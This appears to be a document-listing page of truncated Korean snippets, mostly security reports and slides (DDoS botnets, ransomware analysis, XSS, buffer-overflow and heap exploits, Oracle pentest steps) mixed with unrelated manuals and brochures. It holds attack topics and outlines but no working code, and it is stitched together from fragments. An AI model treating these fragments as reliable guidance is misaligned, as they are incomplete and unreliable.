<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770> 웹하드서비스를통해생성된 Botnet 을이용한 DDoS 공격피해사례 2009. 12. 본보고서의전부나일부를인용시반드시 [ 자료 : 한국인터넷침해대응센터 (KrCERT)] 를명시하여주시기바랍니다. - 1 - 1. 개요 최근발생하고있는 DDoS 사례들을분석해보면그방식들이점점지능화되고조직화되고있다는것을확인할수있다. 또한 DDoS 공격의목적도과거자기과시또는정치적인이유의단순한목적에서벗어나금전적이득을취하거나경쟁업체의영업을방해하기위한목적으로점차기업화되고있기도하다.

More information

Microsoft Word - windows server 2003 수동설치_non pro support_.doc

Microsoft Word - windows server 2003 수동설치_non pro support_.doc Windows Server 2003 수동 설치 가이드 INDEX 운영체제 설치 준비과정 1 드라이버를 위한 플로피 디스크 작성 2 드라이버를 위한 USB 메모리 작성 7 운영체제 설치 과정 14 Boot Sequence 변경 14 컨트롤러 드라이버 수동 설치 15 운영체제 설치 17 운영체제 설치 준비 과정 Windows Server 2003 에는 기본적으로

More information

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks XSS s XSS, s, May 25, 2010 XSS s 1 2 s 3 XSS s MySpace 사건. Samy (JS.Spacehero) 프로필 페이지에 자바스크립트 삽입. 스크립트 동작방식 방문자를 친구로 추가. 방문자의 프로필에 자바스크립트를 복사. 1시간 만에 백만 명이 친구등록. s XSS s 위험도가 낮은 xss 취약점을 다른 취약점과 연계하여

More information

<41736D6C6F D20B9AEBCADBEE7BDC42E687770>

<41736D6C6F D20B9AEBCADBEE7BDC42E687770> IDA Remote Debugging 2007. 01. 이강석 / certlab@gmail.com http://www.asmlove.co.kr - 1 - Intro IDA Remote debugging에대해알아봅시다. 이런기능이있다는것을잘모르시는분들을위해문서를만들었습니다. IDA 기능중에분석할파일을원격에서디버깅할수있는기능이있는데먼저그림과함께예를들어설명해보도록하겠습니다.

More information

월간악성코드은닉사이트탐지 동향보고서 9 월 침해대응단사이버침해대응본부

월간악성코드은닉사이트탐지 동향보고서 9 월 침해대응단사이버침해대응본부 월간악성코드은닉사이트탐지 동향보고서 9 월 침해대응단사이버침해대응본부 ` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 6 2.1 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP10 7 - 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10 2.2 악성코드경유지현황

More information

목차 01. 개요 감염경로 워너크립터동작방식 ) 동작과정상세분석 ) 감염증상 ) 파일암호화및복호화방식 안랩대응현황 AhnLab, Inc. All rights reserved.

목차 01. 개요 감염경로 워너크립터동작방식 ) 동작과정상세분석 ) 감염증상 ) 파일암호화및복호화방식 안랩대응현황 AhnLab, Inc. All rights reserved. Trojan/Win32.WannaCryptor 상세분석 안랩시큐리티대응센터 (ASEC) 분석팀 경기도성남시분당구판교역로 220 ( 우 ) 13493 대표전화 : 031-722-8000 팩스 : 031-722-8901 www.ahnlab.com AhnLab, Inc. All rights reserved. 목차 01. 개요... 3 02. 감염경로... 4 03.

More information

08_spam.hwp

08_spam.hwp 1. 개요 최근국내외에서 E-card 발송을가장한스팸메일로인하여악성코드에감염되는피해가다수보고되었다. 악성코드는메일본문에악의적인 URL을삽입및클릭을유도하는방식으로스팸메일을발송한다. 사용자가스팸메일에포함되어있는악성URL을클릭할경우감염될수있으며, 감염후에는악성코드가감염PC내에저장되어있는메일주소들을추출하여해당주소로동일유형의스팸메일을발송하게된다. 또한, P2P를통한명령전달및추가악성코드다운로드등의악성행위가예상되므로사용자는

More information

#WI DNS DDoS 공격악성코드분석

#WI DNS DDoS 공격악성코드분석 #WI-13-025 2013-07-19 내용요약 이보고서는 7 월 15 일 Fortinet 의 Kyle Yang 이작성한 6.25 DNS DDoS Attack In Korea 를참고하여작성된것임 공격대상이된 DNS 서버는 ns.gcc.go.kr 과 ns2.gcc.go.kr 로, 악성코드에 감염된좀비 PC 는 DNS 서버에대한도메인확인질의에대한응답을두 타깃으로보내지도록하는방법을이용하였음

More information

소규모 비즈니스를 위한 플레이북 여기서 다룰 내용은 다음과 같습니다. 1. YouTube 소개 2. YouTube에서 비즈니스를 위한 채널 만들기 3. 눈길을 끄는 동영상 만들기 4. 고객의 액션 유도하기 5. 비즈니스에 중요한 잠재고객에게 더 많이 도달하기

소규모 비즈니스를 위한 플레이북 여기서 다룰 내용은 다음과 같습니다. 1. YouTube 소개 2. YouTube에서 비즈니스를 위한 채널 만들기 3. 눈길을 끄는 동영상 만들기 4. 고객의 액션 유도하기 5. 비즈니스에 중요한 잠재고객에게 더 많이 도달하기 소규모 비즈니스를 위한 YouTube 플레이북 YouTube에서 호소력 있는 동영상으로 고객과 소통하기 소규모 비즈니스를 위한 플레이북 여기서 다룰 내용은 다음과 같습니다. 1. YouTube 소개 2. YouTube에서 비즈니스를 위한 채널 만들기 3. 눈길을 끄는 동영상 만들기 4. 고객의 액션 유도하기 5. 비즈니스에 중요한 잠재고객에게 더 많이 도달하기

More information

01 이스트시큐리티통계및분석 이스트시큐리티 보안동향보고서 No

01 이스트시큐리티통계및분석 이스트시큐리티 보안동향보고서 No 01 이스트시큐리티통계및분석 이스트시큐리티 보안동향보고서 No.112 2019.01 01 이스트시큐리티통계및분석 No.112 2019.01 이스트시큐리티보안동향보고서 CONTENT 01 악성코드통계및분석 악성코드동향 01-05 알약악성코드탐지통계 랜섬웨어차단및악성코드유포지 / 경유지 URL 통계 02 전문가보안기고 06-14 일요일수행된 APT 변종공격, 오퍼레이션페이크캡슐

More information

6. 설치가시작되는동안 USB 드라이버가자동으로로드됩니다. USB 드라이버가성공적으로로드되면 Setup is starting( 설치가시작되는중 )... 화면이표시됩니다. 7. 화면지침에따라 Windows 7 설치를완료합니다. 방법 2: 수정된 Windows 7 ISO

6. 설치가시작되는동안 USB 드라이버가자동으로로드됩니다. USB 드라이버가성공적으로로드되면 Setup is starting( 설치가시작되는중 )... 화면이표시됩니다. 7. 화면지침에따라 Windows 7 설치를완료합니다. 방법 2: 수정된 Windows 7 ISO Windows 7 설치및 PCIE RAID 설정정보 DK173 초판 11월 2016 A. Windows 7 및 USB 드라이버설치 칩셋사양에따라 Windows 7 설치중에 USB 키보드 / 마우스를사용하려면시스템에서 USB 드라이버를사전로드해야합니다. 이절에서는 USB 드라이버사전로드방법과 Windows 7 설치방법에대해서설명합니다. 방법 1: SATA ODD

More information

Windows 8에서 BioStar 1 설치하기

Windows 8에서 BioStar 1 설치하기 / 콘텐츠 테이블... PC에 BioStar 1 설치 방법... Microsoft SQL Server 2012 Express 설치하기... Running SQL 2012 Express Studio... DBSetup.exe 설정하기... BioStar 서버와 클라이언트 시작하기... 1 1 2 2 6 7 1/11 BioStar 1, Windows 8 BioStar

More information

2017 년악성코드은닉사이트탐지동향보고서 ( 상반기 ) 악성코드은닉사이트탐지 동향보고서 17 년상반기 1

2017 년악성코드은닉사이트탐지동향보고서 ( 상반기 ) 악성코드은닉사이트탐지 동향보고서 17 년상반기 1 악성코드은닉사이트탐지 동향보고서 17 년상반기 1 ` 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 4 2.1 악성코드유포지현황 4 - 유포지탐지현황 4 - 대량경유지가탐지된유포지 TOP10 5 - 악성코드취약점및취약한 S/W 악용현황 6 - 악성코드유형별비율 7 - 위협 IP 및도메인현황 8 2.2 악성코드경유지현황 9 - 경유지탐지 업종별비율

More information

1. 개요 전세계적으로많은피해를일으키고있는랜섬웨어는 년 월국내에 광범위하게유포되기시작하여 년에급격하게증가하였다 랜섬웨어 는이용자의데이터 시스템파일 문서 이미지등 를암호화하는악성코드로 몸값 과소프트웨어 의합성어로시스템을잠그거나 데이터를암호화해사용할수없도록하고이를인질로금전

1. 개요 전세계적으로많은피해를일으키고있는랜섬웨어는 년 월국내에 광범위하게유포되기시작하여 년에급격하게증가하였다 랜섬웨어 는이용자의데이터 시스템파일 문서 이미지등 를암호화하는악성코드로 몸값 과소프트웨어 의합성어로시스템을잠그거나 데이터를암호화해사용할수없도록하고이를인질로금전 `16 년랜섬웨어동향및 `17 년전망 2017. 01 본보고서의전부나일부를인용시, 반드시 [ 자료 : 한국인터넷진흥원 (KISA)] 를명시하여주시기바랍니다. 1. 개요 전세계적으로많은피해를일으키고있는랜섬웨어는 년 월국내에 광범위하게유포되기시작하여 년에급격하게증가하였다 랜섬웨어 는이용자의데이터 시스템파일 문서 이미지등 를암호화하는악성코드로 몸값 과소프트웨어 의합성어로시스템을잠그거나

More information

Windows 10 General Announcement v1.0-KO

Windows 10 General Announcement v1.0-KO Windows 10 Fuji Xerox 장비와의호환성 v1.0 7 July, 2015 머리말 Microsoft 는 Windows 10 이 Windows 자동업데이트기능을통해예약되어질수있다고 6 월 1 일발표했다. 고객들은 윈도우 10 공지알림을받기 를표시하는새로운아이콘을알아차릴수있습니다. Fuji Xerox 는 Microsoft 에서가장최신운영시스템인 Windows

More information

ASEC REPORT VOL.82 October, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서

ASEC REPORT VOL.82 October, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서 Security Trend ASEC REPORT VOL.82 October, 2016 ASEC REPORT VOL.82 October, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,

More information

아이콘의 정의 본 사용자 설명서에서는 다음 아이콘을 사용합니다. 참고 참고는 발생할 수 있는 상황에 대처하는 방법을 알려 주거나 다른 기능과 함께 작동하는 방법에 대한 요령을 제공합니다. 상표 Brother 로고는 Brother Industries, Ltd.의 등록 상

아이콘의 정의 본 사용자 설명서에서는 다음 아이콘을 사용합니다. 참고 참고는 발생할 수 있는 상황에 대처하는 방법을 알려 주거나 다른 기능과 함께 작동하는 방법에 대한 요령을 제공합니다. 상표 Brother 로고는 Brother Industries, Ltd.의 등록 상 Android 용 Brother Image Viewer 설명서 버전 0 KOR 아이콘의 정의 본 사용자 설명서에서는 다음 아이콘을 사용합니다. 참고 참고는 발생할 수 있는 상황에 대처하는 방법을 알려 주거나 다른 기능과 함께 작동하는 방법에 대한 요령을 제공합니다. 상표 Brother 로고는 Brother Industries, Ltd.의 등록 상표입니다. Android는

More information

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름 EDB 분석보고서 (016.01) 016.01.01~016.01.31 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 016 년 1 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한취약점보고개수가가장많았습니다. 분석된 SQL Injection

More information

EQST Insight_201910

EQST Insight_201910 Special Report WannaCryFake 랜섬웨어분석및복호화도구활용 개요 공격자들이금전적이득을위한수단으로랜섬웨어 (Ransomware) 를이용한지수년이지났고그비율도점차감소하고있다. 하지만기존랜섬웨어를변형하여재사용하는변종공격이꾸준히발견되고있어주의가요구된다. 랜섬웨어는몸값을의미하는 Ransom 과 Software 의합성어로, 파일을인질로몸값을요구하며개인

More information

< DC1A6C1D6C1BEC7D5BBE7C8B8BAB9C1F6B0FCBBE7BEF7BAB8B0EDBCADC7A5C1F62E696E6464>

< DC1A6C1D6C1BEC7D5BBE7C8B8BAB9C1F6B0FCBBE7BEF7BAB8B0EDBCADC7A5C1F62E696E6464> Jeju Community Welfare Center Annual Report 2015 성명 남 여 영문명 *해외아동을 도우실 분은 영문명을 작성해 주세요. 생년월일 E-mail 전화번호(집) 휴대폰 주소 원하시는 후원 영역에 체크해 주세요 국내아동지원 국외아동지원 원하시는 후원기간 및 금액에 체크해 주세요 정기후원 월 2만원 월 3만원 월 5만원 )원 기타(

More information

07_alman.hwp

07_alman.hwp 1. 개요 Alman 바이러스는국내에서감염피해가다수보고되었다. 여기서는 Alman 바이러스변종 에감염될경우의악성기능에대하여살펴보았다. Alman은감염된시스템내의실행파일들을추가로감염시킨다. 타시스템사용자가감염된실행파일들을감염여부를확인하지않고복사하여사용할경우감염되게된다. 또한, 네트워크공유폴더와이동디스크를통하여전파되므로, 윈도우암호와공유폴더암호를추측하기어렵게설정하고주기적으로이동저장매체에대한백신점검을실시하는것이필요하다.

More information

Microsoft PowerPoint SDK설치.HelloAndroid(1.5h).pptx

Microsoft PowerPoint SDK설치.HelloAndroid(1.5h).pptx To be an Android Expert 문양세강원대학교 IT 대학컴퓨터학부 개발환경구조및설치순서 JDK 설치 Eclipse 설치 안드로이드 SDK 설치 ADT(Androd Development Tools) 설치 AVD(Android Virtual Device) 생성 Hello Android! 2 Eclipse (IDE) JDK Android SDK with

More information

신종파밍악성코드분석 Bolaven

신종파밍악성코드분석 Bolaven 신종파밍악성코드분석 Bolaven 2013.06.27 개요 지난 1월볼라벤 6차문서에서진화한파밍기법 (= 호스트파일변조 ) 에대해분석및공유를하였다. 6차문서에서는웹을통하여악성코드가유포되는과정과파밍기법의전반적인흐름을알아보았다면, 이번문서에서는파밍기법에서사용되는악성파일의행위에대해중점적으로분석하였다. 파밍기법이란? PC 를악성코드에감염시켜정상홈페이지주소로접속하여도피싱사이트로

More information

01 이스트시큐리티통계및분석 No 이스트시큐리티보안동향보고서 CONTENT 01 악성코드통계및분석 악성코드동향 알약악성코드탐지통계 랜섬웨어차단및악성코드유포지 / 경유지 URL 통계 02 전문가보안기고 새로운 KONNI 캠페인등

01 이스트시큐리티통계및분석 No 이스트시큐리티보안동향보고서 CONTENT 01 악성코드통계및분석 악성코드동향 알약악성코드탐지통계 랜섬웨어차단및악성코드유포지 / 경유지 URL 통계 02 전문가보안기고 새로운 KONNI 캠페인등 01 이스트시큐리티통계및분석 이스트시큐리티 보안동향보고서 No.109 2018.10 01 이스트시큐리티통계및분석 No.109 2018.10 이스트시큐리티보안동향보고서 CONTENT 01 악성코드통계및분석 악성코드동향 01-05 알약악성코드탐지통계 랜섬웨어차단및악성코드유포지 / 경유지 URL 통계 02 전문가보안기고 06-18 새로운 KONNI 캠페인등장, 작전명해피바이러스

More information

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환 취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit 2012-07-19 RedAlert Team 안상환 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 2. Simple Web Server 취약점... 2 2.1. Simple Web Server 취약점개요... 2 2.2. Simple

More information

리눅스설치가이드 3. 3Rabbitz Book 을리눅스에서설치하기위한절차는다음과같습니다. 설치에대한예시는우분투서버 기준으로진행됩니다. 1. Java Development Kit (JDK) 또는 Java Runtime Environment (JRE) 를설치합니다. 2.

리눅스설치가이드 3. 3Rabbitz Book 을리눅스에서설치하기위한절차는다음과같습니다. 설치에대한예시는우분투서버 기준으로진행됩니다. 1. Java Development Kit (JDK) 또는 Java Runtime Environment (JRE) 를설치합니다. 2. 3. 3Rabbitz Book 을리눅스에서설치하기위한절차는다음과같습니다. 설치에대한예시는우분투서버 기준으로진행됩니다. 1. Java Development Kit (JDK) 또는 Java Runtime Environment (JRE) 를설치합니다. 2. 3Rabbitz Book 애플리케이션파일다운로드하여압축파일을풀고복사합니다. 3. 3Rabbitz Book 실행합니다.

More information

ICAS CADWorx SPLM License 평가판설치가이드

ICAS CADWorx SPLM License 평가판설치가이드 ICAS CADWorx SPLM License 평가판설치가이드 CADWorx SPLM License 평가판설치가이드 설치권장사항 Operating System Compatibility ( 반드시 AutoCAD 가설치되어있어야합니다.) 추천시스템 3.0 GHz Intel Pentium IV or greater Windows XP Professional or later

More information

로거 자료실

로거 자료실 redirection 매뉴얼 ( 개발자용 ) V1.5 Copyright 2002-2014 BizSpring Inc. All Rights Reserved. 본문서에대한저작권은 비즈스프링 에있습니다. - 1 - 목차 01 HTTP 표준 redirect 사용... 3 1.1 HTTP 표준 redirect 예시... 3 1.2 redirect 현상이여러번일어날경우예시...

More information

ASEC REPORT VOL.81 September, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC

ASEC REPORT VOL.81 September, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC Security Trend ASEC REPORT VOL.81 September, 2016 ASEC REPORT VOL.81 September, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,

More information

취약점분석보고서 [Photodex ProShow Producer v ] RedAlert Team 안상환

취약점분석보고서 [Photodex ProShow Producer v ] RedAlert Team 안상환 취약점분석보고서 [Photodex ProShow Producer v5.0.3256] 2012-07-24 RedAlert Team 안상환 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 2. Photodex ProShow Producer Buffer Overflow 취약점분석... 2 2.1. Photodex ProShow Producer Buffer

More information

ASEC REPORT VOL.76 April, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성

ASEC REPORT VOL.76 April, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성 Security Trend ASEC REPORT VOL.76 April, 2016 ASEC REPORT VOL.76 April, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정

More information

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자 SQL Developer Connect to TimesTen 유니원아이앤씨 DB 팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 2010-07-28 작성자 김학준 최종수정일 2010-07-28 문서번호 20100728_01_khj 재개정이력 일자내용수정인버전

More information

Mango-IMX6Q mfgtool을 이용한 이미지 Write하기

Mango-IMX6Q mfgtool을 이용한 이미지 Write하기 Mango-IMX6Q mfgtool 을 이용한이미지 Write 하기 http://www.mangoboard.com/ http://cafe.naver.com/embeddedcrazyboys Crazy Embedded Laboratory www.mangoboard.com cafe.naver.com/embeddedcrazyboys CRZ Technology 1 Document

More information

untitled

untitled Oracle DBMS 로그인의접근제어우회 취약점분석 2006. 2. 9 인터넷침해사고대응지원센터 (KISC) 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 룰명시하여주시기바랍니다. 개요 o 2005년이후 Oracle Critical Patch Update(CPU) 는 Oracle사제품대상으로다수의보안패치및보안패치와관련된일반패치를발표하는주요수단임

More information

U.Tu System Application DW Service AGENDA 1. 개요 4. 솔루션 모음 1.1. 제안의 배경 및 목적 4.1. 고객정의 DW구축에 필요한 메타정보 생성 1.2. 제품 개요 4.2. 사전 변경 관리 1.3. 제품 특장점 4.3. 부품화형

U.Tu System Application DW Service AGENDA 1. 개요 4. 솔루션 모음 1.1. 제안의 배경 및 목적 4.1. 고객정의 DW구축에 필요한 메타정보 생성 1.2. 제품 개요 4.2. 사전 변경 관리 1.3. 제품 특장점 4.3. 부품화형 AGENDA 1. 개요 4. 솔루션 모음 1.1. 제안의 배경 및 목적 4.1. 고객정의 DW구축에 필요한 메타정보 생성 1.2. 제품 개요 4.2. 사전 변경 관리 1.3. 제품 특장점 4.3. 부품화형 언어 변환 1.4. 기대 효과 4.4. 프로그램 Restructuring 4.5. 소스 모듈 관리 2. SeeMAGMA 적용 전략 2.1. SeeMAGMA

More information

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 3 - 유포지탐지현황 3 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 5 - 악성코드유형별비율 6 - 위협 IP/ 도메인현황 7 2

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 3 - 유포지탐지현황 3 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 5 - 악성코드유형별비율 6 - 위협 IP/ 도메인현황 7 2 월간악성코드은닉사이트탐지 동향보고서 (1 월 ) 2015. 02. 침해사고대응단 인터넷침해대응본부 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 3 2.1 악성코드유포지현황 3 - 유포지탐지현황 3 - 대량경유지가탐지된유포지 TOP10 4 - 악성코드취약점및취약한 S/W 악용현황 5 - 악성코드유형별비율 6 - 위협 IP/ 도메인현황

More information

Network Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University

Network Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University Network Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University Outline Network Network 구조 Source-to-Destination 간 packet 전달과정 Packet Capturing Packet Capture 의원리 Data Link Layer 의동작 Wired LAN Environment

More information

게시판 스팸 실시간 차단 시스템

게시판 스팸 실시간 차단 시스템 오픈 API 2014. 11-1 - 목 차 1. 스팸지수측정요청프로토콜 3 1.1 스팸지수측정요청프로토콜개요 3 1.2 스팸지수측정요청방법 3 2. 게시판스팸차단도구오픈 API 활용 5 2.1 PHP 5 2.1.1 차단도구오픈 API 적용방법 5 2.1.2 차단도구오픈 API 스팸지수측정요청 5 2.1.3 차단도구오픈 API 스팸지수측정결과값 5 2.2 JSP

More information

01 이스트시큐리티통계및분석 이스트시큐리티 보안동향보고서 No Copyright 2018 ESTsecurity Corp. All rights reserved.

01 이스트시큐리티통계및분석 이스트시큐리티 보안동향보고서 No Copyright 2018 ESTsecurity Corp. All rights reserved. 01 이스트시큐리티통계및분석 이스트시큐리티 보안동향보고서 No.111 2018.12 01 이스트시큐리티통계및분석 No.111 2018.12 이스트시큐리티보안동향보고서 CONTENT 01 악성코드통계및분석 악성코드동향 01-05 알약악성코드탐지통계 랜섬웨어차단및악성코드유포지 / 경유지 URL 통계 02 전문가보안기고 06-27 비너스락커랜섬웨어조직, 한국상대로악성문서파일융단폭격중

More information

메뉴얼41페이지-2

메뉴얼41페이지-2 데이터 기반 맞춤형 성장관리 솔루션 스마트빌 플러스 은행계좌등록 은행계좌를 조회하여 등록합니다. 신용카드등록 신용카드를 조회하여 등록합니다. 금융정보 자동수집을 위하여 인증서이름, 아이디, 비밀번호를 등록합니다. 통합 자동 수집 금융정보 통합 자동수집을 실행합니다 은행계좌등록 은행계좌를 조회하여 등록합니다. 신용카드등록 신용카드를 조회하여

More information

고객 카드 1588-7278

고객 카드 1588-7278 고객 카드 1588-7278 i 안전을 위한 경고사항 안전을 위한 주의사항 i 헤드유닛 DISP RADIO MEDIA PHONE SEEK TRACK 헤드유닛 FOLDER MUTE SCAN SETUP 스티어링 휠 리모트 컨트롤 + - MODE 기본모드 화면 Radio 모드 변경 RADIO 라디오 주파수 검색하기 SEEK TRACK 라디오 모드 사용하기 저장방송

More information

Secure Programming Lecture1 : Introduction

Secure Programming Lecture1 : Introduction Malware and Vulnerability Analysis Lecture3-2 Malware Analysis #3-2 Agenda 안드로이드악성코드분석 악성코드분석 안드로이드악성코드정적분석 APK 추출 #1 adb 명령 안드로이드에설치된패키지리스트추출 adb shell pm list packages v0nui-macbook-pro-2:lecture3 v0n$

More information

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용 Oracle hacking 작성자 : 임동현 (ddongsbrk@naver.com) 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용 Skill List 1. Oracle For Pentest 1. Find TNS Listener (Default 1521 port) (with nmap or amap) 2. Get the

More information

RHEV 2.2 인증서 만료 확인 및 갱신

RHEV 2.2 인증서 만료 확인 및 갱신 2018/09/28 03:56 1/2 목차... 1 인증서 확인... 1 인증서 종류와 확인... 4 RHEVM CA... 5 FQDN 개인 인증서... 5 레드햇 인증서 - 코드 서명 인증서... 6 호스트 인증... 7 참고사항... 8 관련링크... 8 AllThatLinux! - http://allthatlinux.com/dokuwiki/ rhev_2.2_

More information

ASEC REPORT VOL.83 November, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에

ASEC REPORT VOL.83 November, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에 Security Trend ASEC REPORT VOL.83 November, 2016 ASEC REPORT VOL.83 November, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,

More information

01 이스트시큐리티통계및분석 No 이스트시큐리티보안동향보고서 CONTENTS 01 악성코드통계및분석 악성코드동향 알약악성코드탐지통계 허니팟 / 트래픽분석 02 전문가보안기고 년 2 분기, 알약랜섬웨어공격행위차단건수 :

01 이스트시큐리티통계및분석 No 이스트시큐리티보안동향보고서 CONTENTS 01 악성코드통계및분석 악성코드동향 알약악성코드탐지통계 허니팟 / 트래픽분석 02 전문가보안기고 년 2 분기, 알약랜섬웨어공격행위차단건수 : 01 이스트시큐리티통계및분석 이스트시큐리티 보안동향보고서 No.106 2018.07 01 이스트시큐리티통계및분석 No.106 2018.07 이스트시큐리티보안동향보고서 CONTENTS 01 악성코드통계및분석 악성코드동향 01-06 알약악성코드탐지통계 허니팟 / 트래픽분석 02 전문가보안기고 07-16 2018 년 2 분기, 알약랜섬웨어공격행위차단건수 : 398,908

More information

5th-KOR-SANGFOR NGAF(CC)

5th-KOR-SANGFOR NGAF(CC) NGAF Firewall Platform 새로운 세상, 새로운 IT, 새로운 보안 SANGFOR 보안 개념 SAN GFO NGF W+ R NG AF WAF WAF 2010년대 IT산업이 급속하게 발전함에 따라 모든 애플리케이션과 서비스, 그리고 기기들은 BYOD, 사물인터넷(IoT), 클라우드 등과 같은 새로운 기술로 인터넷을 통해 연결되고 있습니다. 이는

More information

Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3

Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3 Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3 Example 3.1 Files 3.2 Source code 3.3 Exploit flow

More information

NTD36HD Manual

NTD36HD Manual Upnp 사용 D7 은 UPNP 를지원하여 D7 의네크워크에연결된 UPNP 기기에별다른설정없이연결하여, 유무선으로네트워크상의연결된 UPNP 기기의콘텐츠를재생할수있습니다. TV 화면의 브라우저, UPNP 를선택하면연결가능한 UPNP 기기가표시됩니다. 주의 - UPNP 기능사용시연결된 UPNP 기기의성능에따라서재생되지않는콘텐츠가있을수있습니다. NFS 사용 D7

More information

임베디드시스템설계강의자료 4 (2014 년도 1 학기 ) 김영진 아주대학교전자공학과

임베디드시스템설계강의자료 4 (2014 년도 1 학기 ) 김영진 아주대학교전자공학과 임베디드시스템설계강의자료 4 (2014 년도 1 학기 ) 김영진 아주대학교전자공학과 Outline n n n n n n 보드개요보드연결필수패키지, Tool-Chain 설치 Kernel, file system build Fastboot 및 Tera Term설치 Kernel, file system 이미지전송및설치 - 2 - Young-Jin Kim X-Hyper320TKU

More information

Microsoft PowerPoint - 6.pptx

Microsoft PowerPoint - 6.pptx DB 암호화업데이트 2011. 3. 15 KIM SUNGJIN ( 주 ) 비에이솔루션즈 1 IBM iseries 암호화구현방안 목차 목 차 정부시책및방향 제정안특이사항 기술적보호조치기준고시 암호화구현방안 암호화적용구조 DB 암호화 Performance Test 결과 암호화적용구조제안 [ 하이브리드방식 ] 2 IBM iseries 암호화구현방안 정부시책및방향

More information

슬라이드 1

